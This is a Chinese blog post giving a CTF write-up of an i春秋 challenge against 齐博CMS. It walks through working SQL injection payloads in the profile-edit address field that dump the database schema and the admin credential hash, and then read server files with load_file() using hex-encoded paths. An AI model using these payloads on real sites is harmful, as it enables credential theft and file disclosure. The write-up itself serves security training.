<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>再见CMS--齐博CMS | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="刚刚在i春秋上做了一道CMS的题，学到的东西挺多的，这里记录一下  题目名称：再见CMS题目内容：这里还是有一个小脑洞">
<meta property="og:type" content="article">
<meta property="og:title" content="再见CMS--齐博CMS">
<meta property="og:url" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="刚刚在i春秋上做了一道CMS的题，学到的东西挺多的，这里记录一下  题目名称：再见CMS题目内容：这里还是有一个小脑洞">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/1.png">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/2.png">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/4.png">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/5.png">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/6.png">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/7.png">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/8.png">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/9.png">
<meta property="og:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/10.png">
<meta property="article:published_time" content="2018-09-21T11:50:28.000Z">
<meta property="article:modified_time" content="2019-12-30T10:31:51.360Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="CMS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/1.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-再见CMS-齐博CMS" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/" class="article-date">
  <time datetime="2018-09-21T11:50:28.000Z" itemprop="datePublished">2018-09-21</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      再见CMS--齐博CMS
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>刚刚在i春秋上做了一道CMS的题，学到的东西挺多的，这里记录一下</p>
<blockquote>
<p>题目名称：再见CMS<br>题目内容：这里还是有一个小脑洞<br><a id="more"></a><br>访问链接之后看到的是一个网站，输入<code>url/admin</code>直接就进入了后台（不过这道题没什么用）</p>
</blockquote>
<pre><code>渗透CMS网站的三个步骤：
        1. 第一步,肯定是要判断出cms类型
        2. 第二步,查询该cms曾经出现的漏洞
        3. 第三步,然后利用这些漏洞拿到flag.
</code></pre><h3 id="0x01-第一步，判断CMS类型："><a href="#0x01-第一步，判断CMS类型：" class="headerlink" title="0x01 第一步，判断CMS类型："></a>0x01 第一步，判断CMS类型：</h3><p>恕我太菜，看了半天也没判断出来是哪种类型，人家说拿最下边的备案号到工信部一查就有网站的信息了，可是我查了一下返回没有匹配到类型，然后看了一下别人的writeup，说是齐博CMS</p>
<p>知道了CMS类型就要进行第二步了</p>
<h3 id="0x02-第二步，搜索齐博CMS的漏洞"><a href="#0x02-第二步，搜索齐博CMS的漏洞" class="headerlink" title="0x02 第二步，搜索齐博CMS的漏洞"></a>0x02 第二步，搜索齐博CMS的漏洞</h3><p>百度上一找还是有漏洞的，最典型的就是SQL注入了，接下来我们来看看如何进行注入<br>先注册一个用户，然后登录上去<br>根据搜索出来的文章，漏洞在<code>/member/userinfo.php?job=edit&amp;step=2</code>这个页面，这里存放的是个人信息，我们的注入就是通过构造语句把需要的信息显示在这些个人信息后边：<br><img src="再见CMS-齐博CMS/1.png" alt=""></p>
<pre><code>根据网上提供的漏洞利用方法，构造这样一个注入语句：
http://ac8bc12353794ed29c196e52eed992b7627b70cb34e54358.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2
post数据：
old_password=123456truename=xxxx%0000&amp;Limitword[000]=&amp;email=123456@qq.com&amp;provinceid=,address=(select version()) where uid=3 %23 
</code></pre><p>这个URL其实是对个人信息修改的URL，我们访问这个URL就可以修改个人信息<br>而下边POST的数据就是要修改的东西<br>old_password是旧密码，后边uid是我们访问个人信息页面时URL里给的，重点在address里面，<code>address=</code>，这个后边的值本来应该填写你要修改的新地址的，我们把注入语句放到这里就可以把注入查询到的东西显示在页面的<code>联系地址</code>后边<br><img src="再见CMS-齐博CMS/2.png" alt=""><br>填好之后访问一下会返回<code>修改成功，页面正在跳转</code><br><img src="再见CMS-齐博CMS/4.png" alt=""></p>
<p>然后我们查看一下个人信息，主要看<code>联系地址</code>一栏<br><img src="再见CMS-齐博CMS/5.png" alt=""></p>
<p>我们可以看到注入成功了，返回了我们需要的东西，那么就开始注入吧。</p>
<pre><code>查询数据库：
URL:http://ac8bc12353794ed29c196e52eed992b7627b70cb34e54358.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2
POST:old_password=123456&amp;truename=xxxx%0000&amp;Limitword[000]=&amp;email=test@qq.com&amp;provinceid=,address=(select database()) where uid=3 %23 

返回数据库：blog
</code></pre><p><img src="再见CMS-齐博CMS/6.png" alt=""></p>
<pre><code>查询表:
URL:http://ac8bc12353794ed29c196e52eed992b7627b70cb34e54358.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2
POST:old_password=123456&amp;truename=xxxx%0000&amp;Limitword[000]=&amp;email=test@qq.com&amp;provinceid=,address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid=3 %23 

查到了很多的表，但是我觉得就第一个有用：admin
</code></pre><p><img src="再见CMS-齐博CMS/7.png" alt=""><br>    查询列：<br>    URL:<a href="http://ac8bc12353794ed29c196e52eed992b7627b70cb34e54358.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2" target="_blank" rel="noopener">http://ac8bc12353794ed29c196e52eed992b7627b70cb34e54358.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2</a><br>    POST:old_password=123456&amp;truename=xxxx%0000&amp;Limitword[000]<a href="mailto:=&amp;email=test@qq.com">=&amp;email=test@qq.com</a>&amp;provinceid=,address=(select group_concat(column_name) from information_schema.columns where table_name=0x61646d696e) where uid=3 %23 </p>
<pre><code>hint:这里由于‘table_name=’的值需要带引号的，但是带了引号语句就报错了，所以利用十六进制来绕过，可以不用带引号

返回列：id,username,password,Email
</code></pre><p><img src="再见CMS-齐博CMS/8.png" alt=""></p>
<pre><code>查询字段：
URL:http://ac8bc12353794ed29c196e52eed992b7627b70cb34e54358.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2
POST:old_password=123456&amp;truename=xxxx%0000&amp;Limitword[000]=&amp;email=test@qq.com&amp;provinceid=,address=(select group_concat(username,password) from admin) where uid=3 %23 

返回username:admin   password:2638127c92b79ee7901195382dc08068
</code></pre><p><img src="再见CMS-齐博CMS/9.png" alt=""></p>
<p>去了各种md5解码网站都查不出来，无奈可能是思路错了</p>
<p>然后访问了一下<code>url/flag.php</code>,输出了flag is here  那么我们的任务就是查看这个文件了</p>
<p>如何利用SQL注入查看文件呢？</p>
<p><a href="https://www.cnblogs.com/blacksunny/p/8060028.html" target="_blank" rel="noopener" title="SQL注入查看文件">https://www.cnblogs.com/blacksunny/p/8060028.html</a></p>
<p>知道了这个方法我们就来构造payload：</p>
<pre><code>URL:http://ac8bc12353794ed29c196e52eed992b7627b70cb34e54358.game.ichunqiu.com/member/userinfo.php?job=edit&amp;step=2
    POST:old_password=123456&amp;truename=xxxx%0000&amp;Limitword[000]=&amp;email=test@qq.com&amp;provinceid=,address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870)) where uid=3 %23
</code></pre><p>括号里的十六进制是要查看的文件的路径<code>/var/www/html/flag.php</code>，我们可以在主页的最上边看到网站的绝对路径</p>
<p>访问之后再查看个人信息的联系地址一栏发现是空的，没关系  查看页面源代码<br><img src="再见CMS-齐博CMS/10.png" alt=""></p>
<p>这样就得到了flag</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/" data-id="ck4sb1gh60004zkuyddvxhqyk" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CMS/" rel="tag">CMS</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2018/10/05/docker%E5%BF%83%E5%BE%97/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          docker心得
        
      </div>
    </a>
  
  
    <a href="/2018/09/20/Yeser-CMS%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">Yeser-CMS漏洞利用</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/CMS/" rel="tag">CMS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/docker/" rel="tag">docker</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/" rel="tag">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/writeup/" rel="tag">writeup</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%94%BB%E9%98%B2/" rel="tag">攻防</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/CMS/" style="font-size: 20px;">CMS</a> <a href="/tags/CTF/" style="font-size: 15px;">CTF</a> <a href="/tags/docker/" style="font-size: 10px;">docker</a> <a href="/tags/php/" style="font-size: 10px;">php</a> <a href="/tags/writeup/" style="font-size: 10px;">writeup</a> <a href="/tags/%E6%94%BB%E9%98%B2/" style="font-size: 10px;">攻防</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/11/">November 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/10/">October 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/09/">September 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/07/">July 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/05/">May 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/11/15/PHP%E7%89%B9%E6%80%A7%E6%80%BB%E7%BB%93/">PHP特性总结</a>
          </li>
        
          <li>
            <a href="/2018/10/28/2018WEB%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95%E7%A7%8B%E5%AD%A3%E9%A2%84%E9%80%89%E8%B5%9B/">2018WEB安全测试秋季预选赛</a>
          </li>
        
          <li>
            <a href="/2018/10/19/%E6%B5%B7%E6%B4%8BCMS/">海洋CMS</a>
          </li>
        
          <li>
            <a href="/2018/10/05/docker%E5%BF%83%E5%BE%97/">docker心得</a>
          </li>
        
          <li>
            <a href="/2018/09/21/%E5%86%8D%E8%A7%81CMS-%E9%BD%90%E5%8D%9ACMS/">再见CMS--齐博CMS</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>